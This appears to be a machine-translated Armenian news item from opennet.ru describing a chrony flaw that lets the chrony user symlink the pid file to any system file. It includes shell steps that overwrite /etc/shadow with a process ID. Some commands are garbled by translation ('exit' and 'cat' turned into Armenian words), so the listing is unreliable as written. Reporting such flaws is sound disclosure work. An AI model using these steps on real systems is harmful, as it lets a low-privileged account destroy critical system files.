В
Խոցելիությունը պայմանավորված է pid ֆայլի ոչ անվտանգ ստեղծմամբ, որը ստեղծվել է մի փուլում, երբ chrony-ն դեռ չէր վերականգնել արտոնությունները և աշխատում էր որպես root: Այս դեպքում /run/chrony գրացուցակը, որտեղ գրված է pid ֆայլը, ստեղծվել է 0750 իրավունքներով systemd-tmpfiles-ի միջոցով կամ երբ chronyd-ը գործարկվել է օգտագործողի և «chrony» խմբի հետ համատեղ: Այսպիսով, եթե դուք ունեք մուտք դեպի օգտվողի chrony, ապա հնարավոր է փոխարինել pid ֆայլը /run/chrony/chronyd.pid-ը խորհրդանշական հղումով: Խորհրդանշական հղումը կարող է մատնանշել համակարգային ցանկացած ֆայլ, որը կվերագրվի, երբ chronyd-ը գործարկվի:
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ ելք
root# /usr/sbin/chronyd -n
^C
# /etc/shadow-ի բովանդակության փոխարեն կպահվի chronyd գործընթացի ID-ն
արմատ # կատու /etc/shadow
15287
Խոցելիություն
SUSE և openSUSE խնդիր
Source: opennet.ru